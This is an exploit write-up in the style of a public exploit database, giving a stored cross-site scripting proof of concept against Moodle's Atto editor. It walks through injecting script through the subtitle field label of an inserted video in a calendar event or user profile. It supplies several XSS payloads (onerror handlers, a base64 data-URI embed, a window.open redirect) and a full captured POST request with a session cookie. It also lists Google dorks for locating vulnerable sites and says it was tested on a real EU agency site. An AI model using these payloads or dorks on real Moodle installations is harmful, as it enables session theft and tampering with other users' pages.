# Exploit Title: Moodle Atto Editor Cross Site Scripting
# Date: 26.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://moodle.org/plugins/editor_atto
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or
calendar/view.php?view=month
# My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ

PoC:

Video PoC: (Update)

https://www.youtube.com/watch?v=vnyo48KImvg

https://www.youtube.com/watch?v=fUWGRqT7lDU

Moodle Atto Editor Stored XSS Problem (Test on euipo.europa.eu)

https://www.youtube.com/watch?v=xaqZagyzTeo

Use Demo:

https://school.moodledemo.net/

Choose a role : Student (example)

Open calendar :

https://school.moodledemo.net/calendar/view.php?view=month

Create new event:

Example:

Event Title "Test"

Description :Choose Insert Video File and choose Video:

Video Source Url you can paste video link from youtube

And open Subtitles and Captions:

Subtitle track URL use video link from youtube

Field Label : There is we can use xss code:

<img src="1" onerror="alert(1)" />

or try in base64

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+"
type="image/svg+xml" AllowScriptAccess="always"></embed>

Insert Media and save this.

Open event and get stored xss.

Or we can use Profile:

https://sandbox.moodledemo.net/user/edit.php?id=4&returnto=profile

Field Label in the Editor vulnerable to XSS.

We can use XSS and js redirect in the profile:

"><video src/onerror=alert(1)><img src=x
onerror=window.open('https://www.google.com/');>

POST:

https://school.moodledemo.net/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form

Host: school.moodledemo.net

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: application/json

X-Requested-With: XMLHttpRequest

Content-Length: 996

Origin: https://school.moodledemo.net

Connection: keep-alive

Referer: https://school.moodledemo.net/calendar/view.php?view=month

Cookie: MoodleSession=4ea0036558425526decc096ed375b886;
EU_COOKIE_LAW_CONSENT=true

[{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test&timestart%5Bday%5D=25&timestart%5Bmonth%5D=3&timestart%5Byear%5D=2021&timestart%5Bhour%5D=10&timestart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}]